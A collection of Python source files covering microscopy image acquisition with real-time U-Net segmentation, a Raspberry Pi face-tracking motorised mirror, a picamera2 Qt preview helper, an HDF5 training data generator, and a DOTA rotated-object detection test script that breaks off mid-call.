position_names = set([x['pos_label'] for x in events])
self.barcodes = dict()
for p in position_names:
self.barcodes[p] = None
def _image_process_fn(self, image, metadata, bridge, event_queue):
"""
update documentation
"""
#image acquisition hook for pycromanager - saves file and metadata
real_snap_time = int(time.time()*1000)
#update image counter
im_num = self.counter
self.counter+=1
#seems the function will be called even if event_queue is None. It was throwing an error before
if im_num+1 < len(self.events):
print(self.events[im_num])
#detect barcode if necessary - right now its linked to the segmentation parameter
detect_barcode = self.events[im_num]['segmentation']['do']
if detect_barcode:
self.detect_barcode_fun(im_num, image)
if self.events[im_num]['segmentation']['do']:
seg_save_path = self.events[im_num]['save_location'].replace(self.events[im_num]['channel']['config'], self.events[im_num]['channel']['config']+'_segmented')
#add to multiprocessing queue phase image
self.q.put((image, seg_save_path))
#take number portion of the save file and check which image it is
which_image = self.events[im_num]['save_location']
which_image = int(''.join(x for x in which_image.split('/')[-1] if x.isdigit())) #
if which_image % int(self.events[im_num]['segmentation']['save_frames']) == 0: #save if mod of image and save frames is 0 - this work also with the first image
io.imsave(self.events[im_num]['save_location'], image, compress=6, check_contrast=False)
# cv.imwrite(self.events[im_num]['save_location'], image) #flag is IMWRITE_TIFF_COMPRESSION + number - refer to libtiff for integer constants for compression
else:
io.imsave(self.events[im_num]['save_location'], image, compress=6, check_contrast=False)
# cv.imwrite(self.events[im_num]['save_location'], image) #i think by defalt it uses compression.
#update metadata - matadata is json with a format:
#{"position":"Pos10",
# "acquire_time":1622229839618,
# "exposure_time":60,
# "PosZ":8399,
# "PosY":-4986.6,
# "PosX":-689.4000000000001,
# "expected_acquire_time":1622229836398,
# "filename":"F:\\Jakub\\EXP-21-BV3236 death\\exp3\\Pos10\\aphase\\img_000000000",
# "channel":"aphase",
# "channel_group":"Fluor"}
tmp = self.events[im_num]
metadata_line = {
'position':tmp['pos_label'],
'acquire_time':real_snap_time,
'exposure_time':tmp['exposure'],
'PosZ':tmp['z'],
'PosY':tmp['y'],
'PosX':tmp['x'],
'expected_acquire_time':tmp['min_start_time'],
'filename':tmp['save_location'],
'channel':tmp['channel']['group'],
'channel_group':tmp['channel']['config']
}
metadata_line['filename'] = metadata_line['filename'].replace('/','//') #<- to match ritaaquire
with open(f"{self.save_path}/metadata.txt", 'a') as f:
f.write( json.dumps(metadata_line, separators =(',',':')) )
f.write('\n')
#add events one by one
if im_num+1 == len(self.events):#remember that numbering starts from 0 - took me a while!
event_queue.put(None)
self.q.put((None,None)) # <- signal to kill the segmentation
print('acq finished')
while not self.check_segmentation_completed.value:
time.sleep(0.1)
elif self.check_abort.value:
event_queue.put(None)
print('acq aborted') # <- signal to kill the segmentation
self.q.put((None,None))
while not self.check_segmentation_completed.value:
time.sleep(0.1)
else:
# print(self.events[im_num+1])
event_queue.put(self.events[im_num+1])
# return image,metadata
def _post_hardware_hook(self,event,bridge,event_queue):
#hook before image acquisition - wait for focus here
core = bridge.get_core()
core.full_focus() #should be PFSOffset
return event
def _pre_hardware_hook(self,event):
#placeholder
return event
def abort_acquisition(self,signal):
#wait for a signal form GUI window
self.check_abort.value = signal
def segment_realTime(self):
"""
update documentation
TODO - load also the network instead of importin UNet
"""
#construct real time acquisition function that checks for queue
import torch
from utils.unet import UNet, UNet_deep
from utils.watershed import watershed
import numpy as np
from skimage import io, measure, morphology
# net = UNet(num_classes=1) #switch cases
net = UNet(max_filters = 512) #switch cases
# saved_model = 'F:\\Jakub\\mdma-main\\Unet_mixed_brightnessAdj_Adam_HybridLoss_512px_cellsUnweighted.pth' #01.06.2021
# saved_model = 'C:\\Users\\kubus\\Documents\\trained_models\\Unet_mixed_brightnessAdj_Adam_HybridLoss_512px_cellsUnweighted.pth' #01.06.2021
#load specified model
saved_model = self.model_path
try:
saved_net = torch.load(saved_model)
except OSError as err:
print(f"error in model path: {err}")
return
net.load_state_dict(saved_net['model_state_dict'])
net.cuda()
while True:
#segmentation core
im, save_path = self.q.get()
if im is None: #'poision pill'
self.check_segmentation_completed.value = True
print('segmentation completed')
break
im = im.astype('float32')
#pad image to match minumum unet reqs
pad_size = 32
sz = im.shape
pad_with = np.ceil(np.array(sz)/pad_size)*pad_size - sz
pad_with = pad_with.astype('int')
im = np.pad(im, pad_width=((0,pad_with[0]),(0,pad_with[1])),mode='constant')
dtype = torch.FloatTensor
im = torch.from_numpy(im).unsqueeze(0).unsqueeze(0).type(dtype)
im = (im - torch.mean(im)) / torch.std(im)
net.eval()
im = im.cuda()
pred = net(im)
pred = torch.sigmoid(pred)
pred = pred.to('cpu').detach().numpy().squeeze(0).squeeze(0)
pred = pred[0:sz[0], 0:sz[1]]
thresh = 0.5
pred = pred > thresh
# pred = watershed(pred)
pred = morphology.remove_small_objects(pred,100)
pred_labels = measure.label(pred).astype('uint16')
io.imsave(save_path,pred_labels, compress=6, check_contrast=False)
# cv.imwrite(save_path,pred_labels)
def detect_barcode_fun(self,im_num,image):
#find barcode and save the location of upper left corner of the detection
if self.barcodes[self.events[im_num]['pos_label']] is None:
barcode_img = find_barcode_region(image)
self.barcodes[self.events[im_num]['pos_label']] = barcode_img
barcode_img = self.barcodes[self.events[im_num]['pos_label']]
if barcode_img is None:
top_left = None
# bottom_right = None
#for debugging - switched off because barcode image is not saved
# b_image = np.zeros((100,100))
else:
top_left, bottom_right = match_barcode(image, barcode_img)
#for debugging - switched off because barcode image is not saved
# b_image = image[top_left[1]:bottom_right[1],top_left[0]:bottom_right[0]]
# #save barcode image
barcode_save_path = self.events[im_num]['save_location'].replace(self.events[im_num]['channel']['config'],'barcode')
#!!
#DONT SAVE THE BARCODE IMAGE - IT SEEMS TO BE STABLE ENOUGH
#!!
# #could be moved for the first instance of the function call
# if not(os.path.exists(os.path.split(barcode_save_path)[0])):
# os.makedirs(os.path.split(barcode_save_path)[0])
# io.imsave(barcode_save_path, b_image, compress=6, check_contrast=0)
barcode_loc = dict()
barcode_loc['file'] = barcode_save_path
barcode_loc['pos'] = top_left
with open(f"{self.save_path}/barcode_locations.txt", 'a') as f:
f.write(json.dumps(barcode_loc, separators=(',',':')))
f.write('\n')
def _runAcq(self):
#here acquisition needs to be stopped by adding 'None' to event_queue
acq = Acquisition(image_process_fn = self._image_process_fn, post_hardware_hook_fn = self._post_hardware_hook)
acq.acquire(self.events[0])
def _run(self):
p1 = Process(target=self._runAcq, args=())
p1.start()
p2 = Process(target=self.segment_realTime, args=())
p2.start()
#open GUI showing progress and adding aborting functionality
total_time = max([t['min_start_time'] for t in self.events])
self.acquisitionDialog = acquisitionDialog.acquisitionDialog(total_time = total_time)
self.acquisitionDialog.abort_acq.connect(self.abort_acquisition)
def main():
acq = run_acquisition()
acq._run()
if __name__ == '__main__':
main()
|
faceRecog.py
|
import cv2
import atexit
import numpy as np
import argparse
import RPi.GPIO as GPIO
import time
import sys
import signal
from picamera import PiCamera, mmal
from picamera.array import PiRGBArray
from picamera.mmalobj import to_rational
from multiprocessing import Process, Queue, Event
from motor import Motor
MAX_ANGLE_1 = 1500
MAX_ANGLE_2 = 900
REWIND_ANGLE_1 = 750 #Rewind angle for motor 1
REWIND_ANGLE_2 = 150 #Rewind angle for motor 2
def cleanup():
GPIO.cleanup()
def motorThread(stop_event, calibrate_event, in_q, en_g):
signal.signal(signal.SIGINT, signal.SIG_IGN)
motor_1 = Motor(1, direction_1, step_1, enable_1, switch_1, MAX_ANGLE_1, REWIND_ANGLE_1, debug=debug)
motor_2 = Motor(2, direction_2, step_2, enable_2, switch_2, MAX_ANGLE_2, REWIND_ANGLE_2, debug=debug)
motor_1.calibrate()
motor_2.calibrate()
motor_1.add_event_detect()
motor_2.add_event_detect()
calibrate_event.set() #Tells the camThread that the motors are ready
direction = None
enable = None
while True:
#Shuts the thread off
if stop_event.is_set():
break
if in_q.qsize() > 0:
direction = in_q.get()
if en_q.qsize() > 0:
enable = en_q.get()
if enable:
motor_1.move(direction, 0.0008)
def camThread(stop_event, calibrate_event, out_q, en_q):
signal.signal(signal.SIGINT, signal.SIG_IGN)
# Load the cascade
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
if debug: print("\nLoaded cascade")
#Sets up the camera
with PiCamera() as camera:
camera.resolution = (640, 480)
camera.framerate = 5
camera.exposure_mode = 'night'
#Sets digital gain to 8.0
mmal.mmal_port_parameter_set_rational(camera._camera.control._port, mmal.MMAL_PARAMETER_GROUP_CAMERA + 0x5A, to_rational(8.0))
rawCapture = PiRGBArray(camera, size=(640, 480))
width = camera.resolution[0]
time_stamp_old = time.perf_counter()
calibrate_event.wait() #Waits for the motor to finnish calibrating
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
#print(f"target fps: {camera.framerate}, dg: {camera.digital_gain}, exposure: {camera.exposure_mode}")
# Read the frame
img = frame.array
# Convert to grayscale
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Detect the faces
faces = face_cascade.detectMultiScale(gray, 1.1, 4)
# Draw the rectangle around each face and detects decides if it wants to go left or right
enable = False
for (x, y, w, h) in faces:
enable = True
if args.show:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
center = (x+w/2, y+h/2)
if center[0] <= width/2:
if debug: print("Left half of image")
out_q.put(GPIO.HIGH)
else:
if debug: print("Right half of image")
out_q.put(GPIO.LOW)
en_q.put(enable)
# Display
if args.show:
cv2.imshow('img', img)
# Stop if escape key is pressed
k = cv2.waitKey(30) & 0xff
if k==27:
break
# clear the stream in preparation for the next frame
rawCapture.truncate(0)
rawCapture.seek(0)
#Calculates and prints the FPS to std out
if args.fps:
time_stamp_new = time.perf_counter()
fps = 1/(time_stamp_new-time_stamp_old)
sys.stdout.write("\rFPS: {0} ".format(round(fps, 1)))
sys.stdout.flush()
time_stamp_old = time_stamp_new
#shuts the thread off
if stop_event.is_set():
break
if __name__ == "__main__":
#Arguemnts parsing
parser = argparse.ArgumentParser(description="Mirror Pi - The mirror that\'s avoiding you")
parser.add_argument("-s","--show", help="Shows the camera and face recognition output to the screen", action="store_true")
parser.add_argument("-c","--nocalibrate", help="Skips the calibration of the motors", action="store_true")
parser.add_argument("-f","--fps", help="Calculates and prints the FPS to std out", action="store_true")
parser.add_argument("-d", "--debug", help="Prints debug statements to std out", action="count", default=0)
args = parser.parse_args()
#This function is called when the program is forced to close
atexit.register(cleanup)
#Pin setup
direction_1 = 3 #Green
step_1 = 5 #Yellow
enable_1 =7 #White
switch_1 = 11 #White
direction_2 = 8 #Green
step_2 = 10 #Yellow
enable_2 = 12 #White
switch_2 = 16 #White
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
#Multiprocesses
dir_q = Queue()
en_q = Queue()
stop_event = Event()
calibrate_event = Event()
debug = args.debug
motor = Process(target=motorThread, args=(stop_event, calibrate_event, dir_q, en_q,))
camera = Process(target=camThread, args=(stop_event, calibrate_event, dir_q, en_q,))
motor.start()
camera.start()
try:
while True:
pass
except (KeyboardInterrupt, SystemExit):
print("\nExiting...")
stop_event.set()
motor.join()
camera.join()
cleanup()
|
qt_gl_preview.py
|
import picamera2
import threading
import atexit
class QtGlPreview:
def thread_func(self, picam2, width, height):
# Running Qt in a thread other than the main thread is a bit tricky...
from q_gl_picamera2 import QApplication, QGlPicamera2
self.app = QApplication([])
self.size = (width, height)
self.qpicamera2 = QGlPicamera2(picam2, width=width, height=height)
self.qpicamera2.setWindowTitle("QtGlPreview")
self.qpicamera2.show()
picam2.asynchronous = True
atexit.register(self.stop)
self.event.set()
self.app.exec()
atexit.unregister(self.stop)
self.qpicamera2.picamera2.asynchronous = False
del self.qpicamera2.camera_notifier
del self.qpicamera2
del self.app
def __init__(self, picam2, width=640, height=480):
self.event = threading.Event()
self.thread = threading.Thread(target=self.thread_func, args=(picam2, width, height))
self.thread.setDaemon(True)
self.thread.start()
self.event.wait()
def stop(self):
if hasattr(self, "app"):
self.app.quit()
self.thread.join()
|
ArtefactBlockGenerator.py
|
import os
import math
import time
import gc
import h5py
import threading
import numpy as np
from skimage.io import imread
from skimage.measure import regionprops,label
from skimage.transform import resize
from . import DataGenerator
class BlockLoader():
def __init__(self, directory, cur_idx, next_idx):
self.t0 = time.time()
self.directory = directory
self.current_block = (None, None) # block_x, block_y
self.next_block = (None, None) # block_x, block_y
self.status = 0
self.cur_block_idx = cur_idx
self.next_block_idx = next_idx
def load_cur(self):
# print(f"{time.time()-self.t0:.3f} : load_cur")
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{int(self.cur_block_idx)}_annos.h5"), 'r') as hf:
annos = hf["annos"][:]
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{int(self.cur_block_idx)}_images.h5"), 'r') as hf:
images = hf["images"][:]
self.current_block = (images,annos)
def load_next(self):
# print(f"{time.time()-self.t0:.3f} : load_next")
if( self.next_block_idx == -1 ): return
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{int(self.next_block_idx)}_annos.h5"), 'r') as hf:
annos = hf["annos"][:]
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{int(self.next_block_idx)}_images.h5"), 'r') as hf:
images = hf["images"][:]
self.next_block = (images,annos)
def swap(self):
# print(f"{time.time()-self.t0:.3f} : swap")
self.current_block = self.next_block
del self.next_block
def get(self, cur_idx, next_idx):
# print(f"{time.time()-self.t0:.3f} : get({cur_idx},{next_idx}) [status={self.status}]")
if( self.status == 0 ):
self.cur_block_idx = cur_idx
self.next_block_idx = next_idx
return False,(None,None)
elif( self.status == 1 ):
self.status = 2
return True,self.current_block
elif( self.status == 2 ):
return False,(None,None)
elif( self.status == 3 ):
self.swap()
self.next_block_idx = next_idx
self.status = 4
return True,self.current_block
elif( self.status == 4 ):
return False,(None,None)
def run(self):
while True:
if self.status == 0:
self.load_cur()
self.status = 1
elif self.status == 1:
time.sleep(1) # wait for generator to get current
elif self.status == 2 or self.status == 4:
self.load_next()
self.status = 3
elif self.status == 3:
time.sleep(1) # wait for generator to get current
class ArtefactBlockGenerator(DataGenerator):
def __init__(self, **kwargs):
super().__init__(**kwargs)
if( self.timeit ): self.log_time += [{'event': 'init artefact generator', 'time': time.time()}]
training_blocks = [f'artefact_tiles_block_{block}_images.h5' for block in range(5)]
n_images = 0
positive_per_block = []
self.block_idxs = np.arange(5)
self.idxs_in_block = []
self.pos_idxs_in_block = []
for block in range(5):
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{block}_annos.h5"), 'r') as hf:
annos = hf["annos"][:]
n_images += annos.shape[0]
positives = annos.max(axis=1).max(axis=1)>0
positive_per_block.append(positives)
idxs = np.arange(annos.shape[0])
self.idxs_in_block.append(idxs)
self.pos_idxs_in_block.append(np.array([idx for idx in idxs if positives[idx]]))
n_positive_images = sum([p.sum() for p in positive_per_block])
self.isset = True
self.split_train_val()
if( self.pPositive == 1. ):
self.batches_per_epoch = sum([p.sum()//self.batch_size for p in positive_per_block])
self.idxs_in_block = self.pos_idxs_in_block
else:
self.batches_per_epoch = sum([p.shape[0]//self.batch_size for p in self.idxs_in_block])
if( self.timeit ): self.log_time += [{'event': 'end init', 'time': time.time()}]
def split_train_val(self):
'''Doesn't care about the params, uses the predetermined split from the blocks'''
with h5py.File(os.path.join(self.directory,f"artefact_tiles_validation_annos.h5"), 'r') as hf:
self.validation_annos = hf["annos"][:20]
with h5py.File(os.path.join(self.directory,f"artefact_tiles_validation_images.h5"), 'r') as hf:
self.validation_images = hf["images"][:20]
def next_batch(self):
if( not self.isset ):
raise ValueError(f"Cannot generate batch before dataset has been loaded.")
if( self.timeit ): self.log_time += [{'event': 'start next batch', 'time': time.time()}]
"""Yield batch_x, batch_y"""
if( self.verbose ):
print(f'Starting {self.n_epochs} epochs.')
'''Generate sequence'''
np.random.seed(self.random_seed_sequence)
self.block_sequence = np.zeros((self.n_epochs, 5)).astype('int')
self.tile_sequence = [[[] for i in range(5)] for i in range(self.n_epochs)]
for e in range(self.n_epochs):
np.random.shuffle(self.block_idxs)
self.block_sequence[e,:] = self.block_idxs[:]
for bidx in self.block_idxs:
tiles_idxs = self.idxs_in_block[bidx]
np.random.shuffle(tiles_idxs)
self.tile_sequence[e][bidx] = tiles_idxs[:]
# self.block_sequence_flat = list(self.block_sequence.flatten()) + [-1,]
# self.block_loader = BlockLoader(self.directory, self.block_sequence_flat[0], self.block_sequence_flat[1])
# self.loader_thread = threading.Thread(target=self.block_loader.run)
# self.loader_thread.start()
for e in range(self.n_epochs):
if( self.timeit ): self.log_time += [{'event': 'start epoch', 'time': time.time()}]
for epoch in self.get_epoch(e):
yield epoch
# def load_block(self, cur_idx, next_idx):
# ready = False
# while not ready:
# ready,(block_x,block_y) = self.block_loader.get(cur_idx, next_idx)
# time.sleep(1)
# return block_x,block_y
def load_block(self, block):
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{int(block)}_annos.h5"), 'r') as hf:
annos = hf["annos"][:]
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{int(block)}_images.h5"), 'r') as hf:
images = hf["images"][:]
return images,annos
def get_epoch(self, e):
if( self.timeit ): self.log_time += [{'event': 'in get_epoch', 'time': time.time()}]
for block_idx in self.block_sequence[e]:
# for i in range(e*5, (e+1)*5):
if( self.timeit ): self.log_time += [{'event': 'in block loop', 'time': time.time()}]
# load block
block_x,block_y = self.load_block(block_idx)
# block_idx = self.block_sequence_flat[i]
# next_idx = self.block_sequence_flat[i+1]
# block_x,block_y = self.load_block(block_idx,next_idx)
tiles_idxs = self.tile_sequence[e][block_idx]
if( self.timeit ): self.log_time += [{'event': 'block loaded', 'time': time.time()}]
for idb in range(len(tiles_idxs)//self.batch_size):
batch_x = self._preprocess(np.array([block_x[idx] for idx in tiles_idxs[idb*self.batch_size:(idb+1)*self.batch_size]]))
batch_y_1 = np.array([block_y[idx] for idx in tiles_idxs[idb*self.batch_size:(idb+1)*self.batch_size]])
batch_y = np.zeros(list(batch_y_1.shape) + [2,])
batch_y[:,:,:,1] = batch_y_1
batch_y[:,:,:,0] = 1-batch_y[:,:,:,1]
if self.gamodel is not False:
for i in range(batch_y.shape[0]):
if batch_y[i,:,:,1].mean() < self.maxPositiveAreaForGenerator \
and np.random.random() < self.pNoise :
batch_y[i] = self.gamodel.predict(np.array([batch_x[i]]))
yield self._augment(*self._random_crop(batch_x, batch_y), idb)
del block_x # making sure we free RAM for next round
del block_y
gc.collect()
def _random_crop(self, batch_x, batch_y):
"""Randomly takes a cropped region of self.tile_size from each image in the mini batch"""
if( self.timeit ): self.log_time += [{'event': 'pre-crop', 'time': time.time()}]
shape_images = batch_y[0].shape
shape_tiles = self.batch_y_shape[1:3]
max_rt = np.array([shape_images[0]-shape_tiles[0], shape_images[1]-shape_tiles[1]])
rts = (np.random.random((batch_x.shape[0], 2))*(max_rt)).astype('int')
cropped_batch_x = np.zeros((len(batch_x),)+self.batch_x_shape[1:])
cropped_batch_y = np.zeros((len(batch_x),)+self.batch_y_shape[1:])
for i,(bx,by,rt) in enumerate(zip(batch_x,batch_y,rts)):
cropped_batch_x[i] = bx[rt[0]:rt[0]+self.tile_size[0],rt[1]:rt[1]+self.tile_size[1]]
cropped_batch_y[i] = by[rt[0]:rt[0]+self.tile_size[0],rt[1]:rt[1]+self.tile_size[1]]
if( self.timeit ): self.log_time += [{'event': 'random crop', 'time': time.time()}]
return cropped_batch_x,cropped_batch_y
def get_validation_set(self):
if( not self.isset ):
raise ValueError(f"Cannot get validation set before dataset has been loaded")
Xval = self._preprocess(self.validation_images)
Yval = np.zeros(Xval.shape[:3]+(2,))
Yval[:,:,:,1] = self.validation_annos
Yval[:,:,:,0] = 1-Yval[:,:,:,1]
return self._random_crop(Xval, Yval)
|
test_dota_base_sota.py
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
from utils import tools
from libs.label_name_dict.label_dict import LabelMap
from libs.utils.draw_box_in_img import DrawBox
from libs.utils.coordinate_convert import forward_convert, backward_convert
from libs.utils import nms_rotate
from libs.utils.rotate_polygon_nms import rotate_gpu_nms
from dataloader.pretrained_weights.pretrain_zoo import PretrainModelZoo
def parse_args():
parser = argparse.ArgumentParser('Start testing.')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/dataset/DOTA/test/images/', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--multi_scale', '-ms', default=False,
action='store_true')
parser.add_argument('--flip_img', '-f', default=False,
action='store_true')
parser.add_argument('--num_imgs', dest='num_imgs',
help='test image number',
default=np.inf, type=int)
parser.add_argument('--h_len', dest='h_len',
help='image height',
default=[600, 800, 1024, 1300, 1600], type=list)
parser.add_argument('--w_len', dest='w_len',
help='image width',
default=[600, 800, 1024, 1300, 1600], type=list)
parser.add_argument('--h_overlap', dest='h_overlap',
help='height overlap',
default=[150, 200, 300, 300, 400], type=list)
parser.add_argument('--w_overlap', dest='w_overlap',
help='width overlap',
default=[150, 200, 300, 300, 400], type=list)
args = parser.parse_args()
return args
class TestDOTA(object):
def __init__(self, cfgs):
self.cfgs = cfgs
self.args = parse_args()
label_map = LabelMap(cfgs)
self.name_label_map, self.label_name_map = label_map.name2label(), label_map.label2name()
def worker(self, gpu_id, images, det_net, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
pretrain_zoo = PretrainModelZoo()
if self.cfgs.NET_NAME in pretrain_zoo.pth_zoo or self.cfgs.NET_NAME in pretrain_zoo.mxnet_zoo:
img_batch = (img_batch / 255 - tf.constant(self.cfgs.PIXEL_MEAN_)) / tf.constant(self.cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(self.cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(
input_img_batch=img_batch)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
if not restorer is None:
restorer.restore(sess, restore_ckpt)
print('restore model %d ...' % gpu_id)
for img_path in images:
# if 'P0302' not in img_path:
# continue
img = cv2.imread(img_path)
# img = np.load(img_path.replace('images', 'npy').replace('.png', '.npy'))
box_res_rotate = []
label_res_rotate = []
score_res_rotate = []
imgH = img.shape[0]
imgW = img.shape[1]
for h_len, w_len, h_overlap, w_overlap in zip(self.args.h_len, self.args.w_len, self.args.h_overlap, self.args.w_overlap):
img_short_side_len_list = self.cfgs.IMG_SHORT_SIDE_LEN if isinstance(self.cfgs.IMG_SHORT_SIDE_LEN, list) else [
self.cfgs.IMG_SHORT_SIDE_LEN]
img_short_side_len_list = [img_short_side_len_list[0]] if not self.args.multi_scale else img_short_side_len_list
if imgH < h_len:
temp = np.zeros([h_len, imgW, 3], np.float32)
temp[0:imgH, :, :] = img
img = temp
imgH = h_len
if imgW < w_len:
temp = np.zeros([imgH, w_len, 3], np.float32)
temp[:, 0:imgW, :] = img
img = temp
imgW = w_len
for hh in range(0, imgH, h_len - h_overlap):
if imgH - hh - 1 < h_len:
hh_ = imgH - h_len
else:
hh_ = hh
for ww in range(0, imgW, w_len - w_overlap):
if imgW - ww - 1 < w_len:
ww_ = imgW - w_len
else:
ww_ = ww
src_img = img[hh_:(hh_ + h_len), ww_:(ww_ + w_len), :]
for short_size in img_short_side_len_list:
max_len = self.cfgs.IMG_MAX_LENGTH
if h_len < w_len:
new_h, new_w = short_size, min(int(short_size * float(w_len) / h_len), max_len)
else:
new_h, new_w = min(int(short_size * float(h_len) / w_len), max_len), short_size
img_resize = cv2.resize(src_img, (new_w, new_h))
resized_img, det_boxes_r_, det_scores_r_, det_category_r_ = \
sess.run(
[img_batch, detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: img_resize[:, :, ::-1]}
)
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
src_h, src_w = src_img.shape[0], src_img.shape[1]
if len(det_boxes_r_) > 0:
det_boxes_r_ = forward_convert(det_boxes_r_, False)
det_boxes_r_[:, 0::2] *= (src_w / resized_w)
det_boxes_r_[:, 1::2] *= (src_h / resized_h)
for ii in range(len(det_boxes_r_)):
box_rotate = det_boxes_r_[ii]
box_rotate[0::2] = box_rotate[0::2] + ww_
box_rotate[1::2] = box_rotate[1::2] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_[ii])
score_res_rotate.append(det_scores_r_[ii])
if self.args.flip_img:
det_boxes_r_flip, det_scores_r_flip, det_category_r_flip = \
sess.run(
[detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: cv2.flip(img_resize, flipCode=1)[:, :, ::-1]}
)
if len(det_boxes_r_flip) > 0:
det_boxes_r_flip = forward_convert(det_boxes_r_flip, False)
det_boxes_r_flip[:, 0::2] *= (src_w / resized_w)
det_boxes_r_flip[:, 1::2] *= (src_h / resized_h)
for ii in range(len(det_boxes_r_flip)):
box_rotate = det_boxes_r_flip[ii]
box_rotate[0::2] = (src_w - box_rotate[0::2]) + ww_
box_rotate[1::2] = box_rotate[1::2] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_flip[ii])
score_res_rotate.append(det_scores_r_flip[ii])
det_boxes_r_flip, det_scores_r_flip, det_category_r_flip = \
sess.run(
[detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: cv2.flip(img_resize, flipCode=0)[:, :, ::-1]}
)
if len(det_boxes_r_flip) > 0:
det_boxes_r_flip = forward_convert(det_boxes_r_flip, False)
det_boxes_r_flip[:, 0::2] *= (src_w / resized_w)
det_boxes_r_flip[:, 1::2] *= (src_h / resized_h)
for ii in range(len(det_boxes_r_flip)):
box_rotate = det_boxes_r_flip[ii]
box_rotate[0::2] = box_rotate[0::2] + ww_
box_rotate[1::2] = (src_h - box_rotate[1::2]) + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_flip[ii])
score_res_rotate.append(det_scores_r_flip[ii])
box_res_rotate = np.array(box_res_rotate)
label_res_rotate = np.array(label_res_rotate)
score_res_rotate = np.array(score_res_rotate)
box_res_rotate_ = []
label_res_rotate_ = []
score_res_rotate_ = []
threshold = {'roundabout': 0.1, 'tennis-court': 0.3, 'swimming-pool': 0.1, 'storage-tank': 0.2,
'soccer-ball-field': 0.3, 'small-vehicle': 0.2, 'ship': 0.2, 'plane': 0.3,
'large-vehicle': 0.1, 'helicopter': 0.2, 'harbor': 0.0001, 'ground-track-field': 0.3,
'bridge': 0.0001, 'basketball-court': 0.3, 'baseball-diamond': 0.3}
for sub_class in range(1, self.cfgs.CLASS_NUM + 1):
index = np.where(label_res_rotate == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_r = box_res_rotate[index]
tmp_label_r = label_res_rotate[index]
tmp_score_r = score_res_rotate[index]
tmp_boxes_r_ = backward_convert(tmp_boxes_r, False)
# try:
# inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r_),
# scores=np.array(tmp_score_r),
# iou_threshold=threshold[self.label_name_map[sub_class]],
# max_output_size=5000)
#
# except:
tmp_boxes_r_ = np.array(tmp_boxes_r_)
tmp = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
tmp[:, 0:-1] = tmp_boxes_r_
tmp[:, -1] = np.array(tmp_score_r)
# Note: the IoU of two same rectangles is 0, which is calculated by rotate_gpu_nms
jitter = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
jitter[:, 0] += np.random.rand(tmp_boxes_r_.shape[0], ) / 1000
inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32),
float(threshold[self.label_name_map[sub_class]]), 0)
box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
score_res_rotate_.extend(np.array(tmp_score_r)[inx])
label_res_rotate_.extend(np.array(tmp_label_r)[inx])
result_dict = {'boxes': np.array(box_res_rotate_), 'scores': np.array(score_res_rotate_),
'labels': np.array(label_res_rotate_), 'image_id': img_path}
result_queue.put_nowait(result_dict)
def test_dota(self, det_net, real_test_img_list, txt_name):
save_path = os.path.join('/data2/pd/sdc/shipdet/v1/works_dir/rodet/test_dota', self.cfgs.VERSION)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(self.args.gpus.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(500)
procs = []
for i, gpu_id in enumerate(self.args.gpus.strip().split(',')):
start = i * nr_image
end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=self.worker, args=(int(gpu_id), split_records, det_net, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
procs.append(proc)
for i in range(nr_records):
res = result_queue.get()
if self.args.show_box:
nake_name = res['image_id'].split('/')[-1]
tools.makedirs(os.path.join(save_path, 'dota_img_vis'))
draw_path = os.path.join(save_path, 'dota_img_vis', nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
detected_boxes = backward_convert(res['boxes'], with_label=False)
detected_indices = res['scores'] >= self.cfgs.VIS_SCORE
detected_scores = res['scores'][detected_indices]
detected_boxes = detected_boxes[detected_indices]
detected_categories = res['labels'][detected_indices]
drawer = DrawBox(self.cfgs)
final_detections = drawer.draw_boxes_with_label_and_scores(draw_img,
boxes=detected_boxes,
labels=detected_categories,
scores=detected_scores,
method=1,
is_csl=True,
